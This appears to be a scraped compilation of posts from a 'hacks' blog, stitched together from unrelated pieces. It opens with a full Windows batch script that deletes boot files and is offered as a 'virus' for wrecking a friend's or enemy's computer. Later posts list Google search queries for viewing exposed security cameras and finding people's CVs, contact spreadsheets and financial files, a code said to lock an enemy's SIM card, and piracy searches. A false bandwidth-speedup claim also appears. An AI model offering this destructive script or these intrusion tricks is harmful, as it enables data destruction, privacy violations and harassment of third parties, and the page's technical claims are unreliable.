Destroy any Computer Easily with one Click


Destroy any Computer Easily with one Click:


Do not try this at your own computer: Well remember that u don’t try this @ ur own computer in any circumstances because the file we are going to create will reboot the computer once and also delete all the file needed by the computer to restart again,so u got it right well if u r pranking with ur friend or ur enemy remember that his or her will never restart unless new Windows is installed.

Here is the Guide to Destroying Virus:
Open up notepad and copy and paste this:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

And SAVE this file as .bat
Now that’s it ur Virus is ready well it’s a Monster Virus .
Remember Don’t click on this file in ur Computer.


Hack and Increase Internet Speed:

In this tutorial I will tell u a very nice way to increase ur internetspeed by 20%.
This 20% internet speed increment may seem to be a little, but if you read this article thoroughly, you can see that this 20% is a lot (especially if your modem is 100MBPS), because Windows only        allows you to use 80% by default.


The Instructions are for Windows 7 Users well XP user can follow this too because the method is same:

Follow these Instructions to speed ur Internet by 20% :1. Go to Start
2. Search for Run or on the desktop press Windows + R Key.
3. Type “gpedit.msc” without the quotes.
4. Expand “Administrative Templates”
5. Then “Network”
6. In Network Search for “Qos Packet Scheduler”
7. Click on it then u will see many tabs on the right hand side Double Click on “Limit Reservable Bandwidth”
8. It will say Not Configured
9. Select Disabled and click on Apply and then OK.
10. That’s it guys u r done now just restart ur System and Xperience the Change.

And for some further internet speed increasing: U can download TCP Optimizer which will optimize ur internet Connection.

How to use Google for Hacking


How to use Google for Hacking.


Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.


1. Hacking Security Cameras

There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”
Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls.
you now have access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.
intitle:”Live View / – AXIS”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.


2. Hacking Personal and Confidential Documents

Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
You can gain access to a list of .xls (excel documents) which contain contact details including email addresses of large group of people. To do so type the following search query and hit enter.
filetype:xls inurl:”email.xls”
Also it’s possible to gain access to documents potentially containing information on bank accounts, financial summaries and credit card numbers using the following search query
intitle:index.of finances.xls


3. Hacking Google to gain access to Free Stuffs

Ever wondered how to hack Google for free music or ebooks. Well here is a way to do that. To download free music just enter the following query on google search box and hit enter.
“?intitle:index.of?mp3 eminem“
Now you’ll gain access to the whole index of eminem album where in you can download the songs of your choice. Instead of eminem you can subtitute the name of your favorite album. To search for the ebooks all you have to do is replace “eminem” with your favorite book name. Also replace “mp3″ with “pdf” or “zip” or “rar”.
I hope you enjoy this post. Pass your comments. Cheers!

Get Free Cricket Scores by SMS


Get Free Cricket Scores by SMS:

100% free Cricket Score Ball by Ball by SMS For All Operators.

> Just dial the below number.

> After Calling on that number u will be automatically rejected in 3 sec.

> After 5 sec, U get a SMS for Live Cricket Match Score. (TDZIPDIAL)

It is working for all operators.


Its 100% Free Just Dial and NJOY

Here is the Number:

02233010055





Send Free SMS Airtel 2 Airtel


Send Free SMS Airtel 2 Airtel:

imageAirtel has reduced the amount of free sms from 350 to 100 its really bad so here we go with another trick for sending free sms airtel to airtel but it has some limitations.I will tell u that @ Last.




Steps To Send Free Sms From Airtel Mobile:
Its Only for Airtel To Airtel Hack And Not for any operater.

> Type SMS like This

%F% (mobile mo) (msg)

> Send it to 59191

> Example : %F% 98xxxxxxxx Nischal Tonthanahal

You are done with the trick confirm that SMS is going or not.

LIMITATION IS : Only 2 SMS Per Day

How to Block Ur Enemy’s SIM Card


ATTENTION: 
Here's a new working trick for free internet on airtel 2012

Content Copyrighted to http://nthacks.com


How to Block Ur Enemy’s SIM Card:

image
Here I am going to share a simple trick for blocking your enemy’s sim card.

Blocking a sim card is too simple.

What you have to do is just enter the below code in the desired phone:

**04*3814*7529*68243#


Entering of above code will ask you to enter the PUK code.


To solve this issue just call customer care and get your PUK code.

Note:Entering of invalid PUK will cause permanent blocking of your SIM

Katamari Hack (play around with the webpage)


Just copy and paste this url into the ADDRESS BAR on any site:

(works best in chrome or firefox 4)

What is this?

This is a "bookmarklet" that turns any page into Katamari Damacy. Try clicking the Katamari! link above.
This was the winner of the 2011 Yahoo HackU contest at University of Washington.

How does it work?

Short version: css transforms (for things stuck to the katamari), canvas (drawing the katamari), and z-index (illusion of depth).
Long version: The bookmarklet loads jQuery and kh.js into the current page. jQuery is used mostly for .offset() and .css().  kh.js is where all the action happens:
  • Splits all the text on the page into words/spans. (StickyNodes::addWords)
  • Builds a grid data structure so that intersections with elements can be found quickly (StickyNodes::finalize). Essentially grid[floor(x / 100)][floor(y / 100)] is a list of elements in a 100x100 pixel block. This should probably be an R-tree, but the hot-spot in this program is definitely in the rendering.
  • The ball and stripes are drawn in a canvas that gets moved around the page (i.e. position: absolute; left: x; top: y;). See PlayerBall::drawBall.
  • When an element is attached to the katamari, a clone is made. The original element is hidden. The new element is moved around by setting -webkit-transform. The transform rotates the element about the rolling axis of the katamari and scales the element to make it look like it's coming out of the page. See PlayerBall::drawAttachedtransform_test.html, andtransform_test2.html.